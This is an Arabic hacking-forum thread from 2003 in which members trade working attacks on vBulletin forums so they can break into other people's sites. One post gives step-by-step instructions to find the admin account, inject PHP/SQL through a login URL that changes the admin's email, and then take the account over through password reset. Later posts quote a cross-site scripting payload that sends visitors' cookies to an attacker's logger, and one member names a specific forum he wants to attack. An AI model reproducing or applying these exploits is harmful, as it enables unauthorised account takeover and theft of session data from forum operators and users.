المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : هل أجد ثغره في منتديات الـ vb

silent storm
25-08-2003, 07:10
السلام عليكم
أخواني الاعضاء

هل اجد ثغره في منتديات الـ vp
وإن كانت موجوده اتمنى لو تضعوا شرح مبسط ومختصر
لها


وعندي مشكله أخرى
ألا هي عندما اود اختراق احد المنتديات وادخل على لوحة التحكم
يكون محمي بيوزر وباسوورد
فهل هناك طريقه لتخطي هذه الخطوه
وشكرا

واعذروني على كثر طلباتي :)
والله لا يحرمنا من اعضاء مثل اعضاء منتديات
العاصفه

أخوكم
silent storm
دعباس
25-08-2003, 10:36
وعليكم السلام

يعني بنظري هالنوع من الثغره السهله :cool: :eek:

PHPSHELL بس يعني مااعرف اشرح :confused: |1|

<<== فيه افهم من هذا يبي يردون انشالله :)


تحياتي لكم
silent storm
26-08-2003, 12:33
هلا اخوي الغالي دعباس
طلتك علينا تكفي :)
واشكرك اخوي على هالمعلومات
وإن شاء الله ننتظر البقيه
شوق
26-08-2003, 10:34
هلا اخوي سايلنت

هذا شرح
__________________________________________________ _______

اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...info&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

http://URL/member.php?soitgoe68e45u...etinfo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...VALIDPASS&url=');'.$users=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WHE RE+username='ADMIN'').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات &@#&@#&@#&@#&@#&@#&@# .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

أنت قمت بكتابة كلمة سر خاطئة

you typed in the wrong password


9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

__________________________________________________ _

تحياتي لك :) وارجو عدم استخادمها ضد العرب بليززززززززز
دعباس
26-08-2003, 11:30
مشكوره اختي
silent storm
27-08-2003, 03:22
الف الف الف شكر لك اختي شوق
دائم نجدك في مقدمة مجيبي الطلبات
يالله ابسطي من قدك عاد :)

بس عندي مشكله يا شوق :confused:

في نفس الشرح
بعد ما أخرج الادمن من المنتدى
اكتب هالجمله

http://URL/member.php?action=login&...VALIDPASS&url=');'.$users=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WHE RE+username='ADMIN'').'

ونغير عليها التغييرات التاليه

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى



لكن بالنسبه لـ VALIDUSER فير موجوده في الجمله :confused:
وحطيت اسم المستخدم بدل كلمة username

وطلع لي صفحه خطأ :confused:
MIDO82
27-08-2003, 08:12
VALIDUSER صحيح مالقيتها هاذي؟؟
او نحطها بدال لوقين؟
دعباس
27-08-2003, 01:23
مرحباا شباب

ترا هاي الثغره خاصه بالاصدار .version 2.0.0

يعني الجديد لا تتعبون انفسكم

والله اعلم

منتظرين المعلمه شوق :)


سلام
silent storm
27-08-2003, 03:03
نجرب وماله يا MIDO82 :)


اخوي دعباس متاكد انها للنسخه هذي بس :confused:
بس شوق ما عطتنا خبر عن هالنقطه

وما زلنا ننتظر المعلمه شوق |1|
شوق
28-08-2003, 01:15
هاههههههههههههه:D

وصلت لكم اسفه على التاخير ومااحب اني اعقدكم في الموضوع فانا من ناحيتي ياسيلنت انك تدخل الموقع هذا بتحصل كل شى برامج + شرح+ اشياء ماقد خطرت على بالك+ ماادري والله اشياء كثير ادخل واحكم واختار على كيفك ;)

http://members.lycos.co.uk/drdeath2003/

تحياتي لكم :)
silent storm
28-08-2003, 02:25
الف الف الف شكر لك اخت شوق على هالموقع
بصراحه
بحر في معلوماته عن الهكر
تسلمين يالغاليه :)
خالد7
29-08-2003, 02:30
في ولوقلتها راح يكون التطبيق على المنتديات العربيه وانا واثق من هالشي بان اول الضحايا هم
شوق
29-08-2003, 07:45
اخوي خالد7

عشان كذا ...............

تحياتي لكم :)
silent storm
29-08-2003, 11:08
اشكرك اخوي خالد7 على حضورك
خالد7
30-08-2003, 12:20
العفوا حبيبي ...بفيدك بشي
طريقة
http://URL/member.php?action=login&...VALIDPASS&url=');'.$users=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WHE RE+username='ADMIN'').'

ناجحه @ بس مايرسللك اسم المدير !! فمعناته فاشله:confused:


http://www.geocities.com/doodynn/mont.htm



اما هذي انا ماجربته جرب وقول
http://web.arabhackerz.org/vBulletin.html
silent storm
01-09-2003, 02:54
أخوي خالد7
لو تكرمت تعاوني بس في آخر طريقه اللي
طرحتها لي على هذا الموقع

http://web.arabhackerz.org/vBulletin.html


مشيت مع الخطوات تمام لكن آخر شي في التغييرات اللي طرت على
الملف المرفوع ما فهمت لها زين يا ليت توضح لي إن فضيت

وهذا امتداد الملف المرفوع
http://www.arabic-eyes.net/lumina/silent.php

وهذا منتدى الضحيه المراد اختراقه
http://www.dannymorrison.com/forum/

وهذا اللي جلسنا نفحط فيه
هناك تغييرات على الصفحه المرفوعه سوف تعملها كلاتي:
و لتخطي هذه المشكلة ينبغي استبدال رموز الـ Script Code بالنظير الست عشري لكل رمز، راجع الشفرة التالية:



PHP:--------------------------------------------------------------------------------
<?PHP

$Path = "Http://127.0.0.1/&@#&@#&@#&@#&@#&@#Logger.php";

Print ("/member2.php?s=[Session]&action=viewsubscription&perpage=-->" . URLEncode ("<Script>location='" . $Path . "?Action=Log&&@#&@#&@#&@#&@#&@#='+(document.&@#&@#&@#&@#&@#&@#);</Script>"));

?>

--------------------------------------------------------------------------------


تستطيع استبدال قيمة Path بعنوان أو مسار الاستثمار Exploit الخاص بالمسجل، ثم قم بنسخ المخرجات و ألحقها بمسار المنتدى، مثال:


code:--------------------------------------------------------------------------------Http://www.Web-Site.net/vB-Forum/member2.php?s=[Session]&action=viewsubscription&perpage=-->%3CScript%3Elocation%3D%27Http%3A%2F%2F127.0.0.1%2 F&@#&@#&@#&@#&@#&@#Logger.php%3FAction%3DLog%26&@#&@#&@#&@#&@#&@#%3D%27%2B %28document.&@#&@#&@#&@#&@#&@#%29%3B%3C%2FScript%3E--------------------------------------------------------------------------------


و بالنسبة للاستثمار و الأخطاء التي يعطيها مفسر الـ PHP فيجب التأكد من توافقية الدوال مع اصدار المفسر.

ملاحظة: تم تجريب الاستثمار على Apache/1.3.20 (Win32) PHP/4.0.6.


وما قصرت اخوي خالد
خالد7
01-09-2003, 02:03
لا تعب حالك شاركنا هنا وخلاص اترك عنك ثغرات مغلقه وشروح معقده

شاركنا اقصد هيضني شوي علشان اشرحها بالمره
هاهاهاهااااااااااااااي

http://www.3asfh.com/vb/showthread.php?s=&threadid=3938
silent storm
01-09-2003, 11:07
;) يا حليلك بتلميحاتك يا خالد7 ههههههههههههههههه :D